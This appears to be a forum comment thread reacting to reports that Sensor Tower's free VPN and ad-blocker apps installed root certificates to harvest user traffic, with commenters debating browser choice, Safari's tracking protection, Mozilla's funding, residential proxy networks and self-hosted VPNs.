This is literally, one among many reasons (ha!), why I use Firefox. Every other browser vendor is a for-profit entity, and as such will limit good ad-blocking measures as Safari and Chrome have done recently with their new "security" policies.
This is also why I don't use a VPN I don't run (or certainly not one that hasn't been audited with a good reputation), and I certainly would never fucking dream of using a free VPN unless all the traffic over it is absolutely worthless.
... How many of these things install root certs where even after you've canceled your subscription you're still accepting their bullshit?
On the other hand, this could make for a hilarious experiment using adversarial neural networks to troll the assholes mining data from the VPNs.
"Every other browser vendor is a for-profit entity, ..."
Not the one that authored the text-only browser I am typing this from.
Whether Mozilla turns a profit or not makes little difference in this instance. Mozilla does not survive on donations from users. Its employees are not volunteers working for free to defend user privacy. Its generously compensated executives and staff need money from the online ad business, just like employees from the other browser vendors. If Mozilla stopped taking money from Google or some other online ad business partner, then Mozilla employees would lose their jobs.
Note I do not recommend using a text-only browser interactively for any sort of commercial or important online activity. I use it for recreational activities like reading HN and the websites posted here.
I used lynx many years ago in the early 90's. After switching to links, I would never intentionally use lynx again. It amazes me that people still mention lynx when the topic of text-only browsers comes up. I would be shocked if these people who recommend it are using it as their browser on a daily basis for decades.
> Every other browser vendor is a for-profit entity, and as such will limit good ad-blocking measures as Safari
I thought Safari introduced support for Content Blockers specifically to avoid ad blockers from phoning home and passing potentially sensitive information to the ad blocker's writer.
Lots of people then got quite cross that their favourite blocker had been blocked.
That is exactly the bullshit they want you to believe. Restricting your
ability to install/modify software on your computer because bad software
could harm you. You have been bamboozled.
... This entire discussion IS about bad software that DOES harm you, and you rag on the measures to specifically protect against something like that? What the heck?
Yes, I'm not saying there is no harmful software, I'm saying
these kind of "protections" are the wrong solution. The same
people who install blindly any add-ons will also install any
exe-files if the promising website tells them to because the
browsers add-on-system does not provide the required mechanics.
So the next step is to disallow exe-files. But of course you can
let the exe-file get signed for a "small" fee...
I think, especially given events that’ve transpired since, Apple was fairly justified in not giving third party developers unfettered access to web pages and network requests running through the browser.
I am very glad that I can install an add blocker on my phone and I don’t have to trust that it’s not going to mine and sell my data.
I haven’t been bamboozled, I’ve just made a different decision with a different set of trade offs than you.
The dramatically reduced incidence of various non-technical family members having to go to me or Geek Squad for yet another virus infection says otherwise.
Keep in mind that Apple gets paid a percentage of Google ad revenue made in Safari; just like how Mozila gets paid a percentage of Google ad revenue made in Firefox.
Apple came up with a better way to mine your personal data through its Safari browser.
They introduced a feature (Intelligent Tracking Protection - ITP) that they claim blocks ads / trackers from tracking you online on the various sites that you visit.
A simplistic explanation:
Every time you visit a website with an ad or a tracker, it leaves a cookie on your browser that identifies you. You could block many of them by telling your browser to block cookies from third-party domains. This coupled with ad blockers is one effective way to tackle online tracking.
What Apple did was to deliberately take away this control from us and ask us to trust them to deicide which cookie is allowed and which is not.
They REMOVED the feature to allow us to block third-party cookies. So now you have only 2 option in Safari - allow ALL cookies or block all cookies. You cannot block all cookies as it breaks nearly all websites. Apple claims that you should allow websites to set cookies so it can research and find out which cookies track you. And so every time you visit a website, and it sets a cookie, Apple collects this information "anonymously".
So in effect, this "privacy feature" is designed to let Apple know about every website you visit.
Ofcourse, Apple claims all this data is anonymously stored (i.e. not tied to any of your personal information like Apple id). (This idea of anonymous collection of data has already been debunked and proven false as it can be "deanonymised").
Second, Apple claims that its anti-tracking feature will not work in private browsing mode because private browsing mode doesn't save cookies once you close a tab. So in effect, Apple deliberately cripples private browsing mode, in effect, advocating that all its users use normal browsing mode (so that Apple, and others, can mine more data from its users)
Third, by taking away cookie control, Apple now is in full control of deciding which cookie can stay in the browser. This means that if you visit a website regularly, Apple will decide how its cookies should be treated, regardless of whether you want it deleted it or not.
All in all, Apples anti-tracking feature is just designed to give their competitors a harder time while giving Apple the ability to mine their users data better and also taking control away from them.
Google researchers also found that Safari's anti-tracking feature was broken and quite weak:
> ... According to the Google researchers, the vulnerabilities left personal data exposed “because the ITP list implicitly stores information about the websites visited by the user”.
> ... The researchers also identified a flaw that allowed hackers to “create a persistent fingerprint that will follow the user around the web”, while others were able to reveal what individual users were searching for on search engine pages.
Apple claims to have fixed this. But the fact remains that the feature is still not quite effective because most online trackers have moved on to browser finger printing.
The developer of the popular ad-blocker uBlock Origin has also stated that Safari / webkit ad-blocking abilities leave a lot to be desired.
> So now you have only 2 option in Safari - allow ALL cookies or block all cookies.
Didn't they make blocking of 3rd party cookies the default? If I browse privately and look at the cookies on my machine by going to Prefs > Privacy > Manage Web Site Data, I don't see any cookies showing up after I've closed a page.
> ... How many of these things install root certs where even after you've canceled your subscription you're still accepting their bullshit?
It does seem like a bit of a flaw that removing the app on iOS doesn't automatically remove the profile such apps install: https://support.apple.com/en-au/HT205347
I'm pretty sure Apple will remove the VPN profile, which is why leaving a root certificate seems dangerous for users who don't know what they're for.
There can, of course, be legitimate uses for this tech. https://www.charlesproxy.com/documentation/ios/ or maybe opting out of certificate transparency reports, but they do seem like edge cases.
> It does seem like a bit of a flaw that removing the app on iOS doesn't automatically remove the profile such apps install
AFAIK only system apps can install profiles. These apps work by getting the user to install a separate profile via Safari.
> I'm pretty sure Apple will remove the VPN profile, which is why leaving a root certificate seems dangerous for users who don't know what they're for.
If these aren't enterprise profiles then Apple may not have an easy mechanism to block them (other than blocking their semantics).
Apple has a ton of variants of profiles, I keep expecting them to deprecate swaths of types/installation methods to help this be more understandable.
If Safari has a system back button to take me back to the app, it knows enough to include the “originating app” for the profile. Similarly it could create an association between the domain the profile is hosted on and the app. Finally, Apple could indeed change how profile installation works such that profiles need to be signed and associated with either an Enterprise account or a per-app developer account, to make deleting such apps-with-profiles in future more robust. Lastly, like privacy warnings, Apple could say that Certificate Owner has installed a root certificate to monitor all communications and let you opt out. That would be ideal, to deprecate existing methods and even more explicitly support app-based root certificates in their privacy warning flows.
Being a foundation does not entirely remove the incentives to do shady shit, it just reduces them a bit. Look at ISOC's sale of .org or for Mozilla when they gave Cliqz the browsing histories of a random sample of all German Firefox users.
The Mozilla Corporation is wholly owned by the Mozilla Foundation and bound by its charter. The split structure is an artifact of corpotations being better-understood legal entities than foundations, and thus easier to deal with in various situations (hiring, contracts, etc). See also the Signal Foundation and Signal Messenger, LLC.
This was an experiment (2017), not sure what became of it.
> Less than one percent of users in Germany installing Firefox from our main download page will receive a version of Firefox with Cliqz recommendations enabled out of the box.
> This experiment also includes the data collection tool Cliqz uses to build its recommendation engine. Users who receive a version of Firefox with Cliqz will have their browsing activity sent to Cliqz servers, including the URLs of pages they visit. Cliqz uses several techniques to attempt to remove sensitive information from this browsing data before it is sent from Firefox. Cliqz does not build browsing profiles for individual users and discards the user’s IP address once the data is collected.
Firefox is like that really ugly flower that blooms once every hundred years, they leapfrog the competition briefly and then eventually degrade back to being crap for regular users. I'm aware of the technical politics around what causes this but that only really matters for people who choose browsers based on cyber politics. Quantum was good for six months, now we're back to the same situation where almost everyone outside the tech bubble is using Chrome.
You'd think that maybe this would cause them to exercise some strategy, like rushing to conquer mobile since Chrome's mobile ui is trash, but nope. Hell, Brave of all things is doing better at mobile than Firefox.
I install firefox + ublock origin + https everywhere whenever I can weather it's friends, family or colleagues. After a bit of explanation they usually understand the matter. It's all about user education.
I have had zero "relapses" back to safari or chrome so far, they all seem to like browsing without ads and tracking.
Indeed. It only takes about 45 seconds to remove almost all ads from someone's online experience. Not getting ads on youtube is by itself a game changer for alot of people. Many people happily pay for blessings from monks and priests that take about the same time, except this actually improves lives in a concrete way and is free. Spread the gospel of FOSS
>Firefox is like that really ugly flower that blooms once every hundred years, they leapfrog the competition briefly and then eventually degrade back to being crap for regular users.
It's hard to move browsers permanently if you're not prepared. I moved to FF Quantom for a bit, but had to regularly open Chrome to get passwords etc. And the Chrome assholes removed the password export (or at least I could not for the life of me get it to work at the time)
I ended up going back for a bit and added a password manager, and now I can move between browsers easily - but as I said, it's not always straightforward, especially for _most_ non-tech users.
I distinctly recall the option to manually import passwords being harder to find (solution is to either import them from another browser or enable a flag to import passwords from a CSV file).
> It's hard to move browsers permanently if you're not prepared.
I find it rather easy, at least in my case. Passwords are all managed via a password manager, I barely use bookmarks, so most of the work is re-installing and configuring a few plugins, which I also don't use many of
I'm waiting for news about OneTrust, the company handling GDPR/CCPA cookie management for a ziiilllion sites. I can't imagine they aren't getting in on this action.
Ahh but the users of the VPNs apps have no idea that Sensor Tower is behind the app and collecting and selling their data.
It might be in the terms of service and briefly shown to them, but in the literal, practical sense, the users actually do not know! It is without their knowledge.
This is basically a MITM proxy, which I'd say is really essential for true adblocking and content filtering, especially on the locked-down mobile platforms and with the rise of HTTPS. The question is then who runs the proxy and whether you trust them.
I've been doing the same with Proxomitron for years, although in that case I run the proxy, I certainly trust myself, and --- I'm not sure about whether these apps even have such a feature --- I can modify how/what it filters/blocks at any time.
This is generally possible (With how Wireguard-based VPNs currently work) but Apple would much rather you use the Safari content blocker API for defining rules.
I use two devices. The first runs a kernel+userland I can edit and acts as the gateway/AP and DNS server for the second, which runs some commercially-motivated, "locked-down" consumer OS.
What hardware are you using for the gateway/AP? What's the backhaul, a USB LTE modem? Do you carry it in a handbag with a USB battery pack?
I've been thinking about doing this and scrapping all but one of my data plans, and having a robust default-deny whitelist of allowed IPs/netblocks/hostnames on the phone vlan/ssid, but haven't worked out all the details yet.
The gateway is a small form-factor computer with a rechargeable battery, e.g., a netbook or laptop. The AP is a SBC that the preferred kernel, e.g., NetBSD, OpenBSD, Linux, etc., supports. The AP draws power from the gateway's battery via USB.
Regarding LTE modems, I do not use a data plan on "locked-down" mobile devices for personal use. Somehow I have been able to survive on WiFi alone.
So you carry around a laptop powered on all day when you are out? What about battery life?
I’m looking at something like a raspberry pi zero, using the built in wifi to serve as an AP, powered from a large-ish USB battery pack, something that could run 18h+, with a USB LTE modem. Ideally I could get it small enough to strap to an ankle or something so I don’t need to bring a bag.
You load a list of rules into it, and the only thing it is allowed to do is make a classification of where the URL should go (if you're paranoid, make this classification strictly binary). It cannot write any state out, nor connect to the internet itself.
It's a solution for some situations, but not the one userbinator was talking about.
The problem here is needing to trust the filter program. Moving code into a sandbox doesn't help, because you still need an app outside the sandbox to make it actually filter, and the problem is not being able to trust an app.
I mean, you really can't trust that the app just isn't a dud and does nothing. But with sandboxing you can prevent the app from reporting your browsing history.
You have X inside a sandbox. It has the filtering logic, and can't report home. Cool.
But you need Y outside the sandbox so that your content actually gets filtered. Without Y, your "filtering app" does nothing. You need code that is outside the sandbox.
But how do we set up Y? In the context of a mobile device, Y would have to be a VPN app.
But the original problem is that we can't trust VPN apps to do what they say.
So even though you moved the actual filtering logic into X, and put it in a secure sandbox, you didn't solve the problem of needing to trust an app.
(And "put Y into the trusted OS" is not a valid solution toward getting filtering on "locked-down mobile platforms".)
Again, you can't trust that the app actually does filtering, because as you said the filter list is loaded and evaluated by code that has no obligation to do this. But it can't track your internet browsing because the component that could, the VPN extension, is inside a sandbox.
Interesting! So what you're really saying is that a VPN isn't needed. But this function only works on "supervised" devices. That's a pretty severe limitation.
It has to be able to take the web content, manipulate it to remove the stuff it is trying to block, and then return it to the browser... what is to stop if from returning content with image tags with sensitive data encoded in the url? The browser will have to load the content to display.
It's from an era when software was largely not ad-supported nor infused with "telemetry", and written by one person who never "sold out" (and sadly passed away long ago), so I trust it far more than all the shady "privacy" services today. It's been around long enough that many others have reverse-engineered and analysed it substantially, understanding it enough to make patches to improve and fix, as well as near-equivalents. Look up "Proxydomo" if you want to go down that rabbit hole...
Oxylabs and Luminati are both residential proxy networks.
Hola is a VPN that sells access to Luminati.
NordVPN is a VPN that does not sell access to anyone. It is not sending anyone else's data through your connection. There's an accusation that it shares ownership with Oxylabs, and that's about it. NordVPN might be buying, not selling, residential proxy access from someone, but it's very unclear if that's true and either way doesn't have a negative impact on their customers.
That is an accusation that Nord or third party partners is turning devices into residential proxies.
It includes a direct quote from Nord on page 5 that says they buy access to IPs, and that the individuals they buy from are "fully aware of the purpose and receive a reward for the traffic sent and received".
Even if you think the "fully aware" part is a lie, I don't think there's any reason to think the part about buying it is a lie.
Even the worst version of a VPN buying IPs from some shady dealer is very different from secretly putting data on their own users' connections. It remains quite misleading to write "oxylabs (NordVPN), luminati (Holla)", implying that Nord is doing the same thing as Hola, of turning their own users into proxies.
A snippet from the article on the residential IP's:
"Furthermore, we conducted realtime device fingerprinting when we captured each IP address. And we have successfully identified the device type and vendor information for 547,497 IP addresses. What surprised us is that 237,029 of them turned out to be IoT systems, such as web camera, DVR, and printer."
They do far more than simply install backdoors for residential proxy networks. They also capture and resell your entire http(s) request history via their mitm. That's every single HTTP request every single app on your phone makes. It's a gold mine of information. They also sell profiles of exactly which apps you have installed on your phone, how often you're using each, and geolocation data if they get that permission.
Avast recently shutdown their subsidiary Jumpshot [1] who was doing similar. They were intercepting desktop traffic through their anti-virus software and browser plugins, and then selling your complete browsing history on a per-user (don't worry it was "anonymized" /s) to anyone willing to pay. Mostly to corporations, marketing platforms, and hedge funds.
Sensor Tower is doing the precisely the same thing for the same audience.
Does this break "California Consumer Privacy Act" of 2020?
As far as I now, companies are now legally obligated to give California residents the opportunity to see how their personal information is being tracked, how it's being sold, and how to opt out.
I've built more than one VPN network over the years - and I don't use the ones I built. My philosophy has always been that I can't trust the network after I no longer own it - and if the code isn't open.
The hard reality is that you have no way of knowing what's being logged if you don't have full access to the servers. I've always pushed for leaving VPN servers on operating systems running in read-only, on read-only disks, and open to the world (i.e customers who log in). It's one of the best forms of real transparency that I can think of.
> “ Apple and Google restrict root certificate privileges due to the security risk to users. Sensor Tower’s apps bypass the restrictions by prompting users to install a certificate through an external website after an app is downloaded.”
Seems like it will be open and shut case, quickly banning the apps and hopefully Sensor Tower entirely, especially given the other details of the article explaining they’ve already banned apps from Sensor Tower for previous violations.
What is current best-practice ad blocker for iOS Safari? AdGuard? Ad-Blocker Pro? I’ve tried Firefox but besides their tracker blocking ads are still prevalent.
Sensor tower is a mobile intelligence tool. Correct me if I am missing something, but what is a big deal here?
And when you use free apps, obviously they sell your data (or with a high chance), they are not charities. But in return, you get hassle-free ad-blocking or VPN. It looks like a fair deal to me. Or you can find a good one that will be expensive, or do it yourself (paying the same or more, just with your time).
And there is a huge difference between what they can do and what they actually do.
In coffee shops and other places, surveillance systems can be used to steal your passwords and logins etc. But I strongly suspect each and everyone has entered their personal details while been recorded bt the surveillance system for many times. Or just in public place where someone can see, etc.
How about the huge difference of knowing that you give away your data and not knowing? There is nothing "fair" about it and just the fact that they are now gone from the stores should...I don't know...maybe make you think about that a bit?
PS: just because there are worse situations, doesn't make this a good one.
I meant general practice done legally, e.g. stating this in their policy and showing when you run the app for the first time that it will sell their not personal data in exchange for free service.
The concept is fair as some are willing to pay with money, some are ok to pay with their data. Hiding the fact that you will sell data obviously deserves the punishment.
I 100% agree with you - but people tend to ignore "privacy" if something is free.
I was just talking with a colleague of mine who is in this "privacy is important" camp. But he is using mail tracker from hunter.io (since it is free).
It was really hard to explain him that that company which allows you to "Find the email address of any professional" is giving mail tracker for free in order to collect more data (to their defense they clearly say in their privacy policy and you can opt-out of the "sale" of personal information).
This is also why I don't use a VPN I don't run (or certainly not one that hasn't been audited with a good reputation), and I certainly would never fucking dream of using a free VPN unless all the traffic over it is absolutely worthless.
... How many of these things install root certs where even after you've canceled your subscription you're still accepting their bullshit?
On the other hand, this could make for a hilarious experiment using adversarial neural networks to troll the assholes mining data from the VPNs.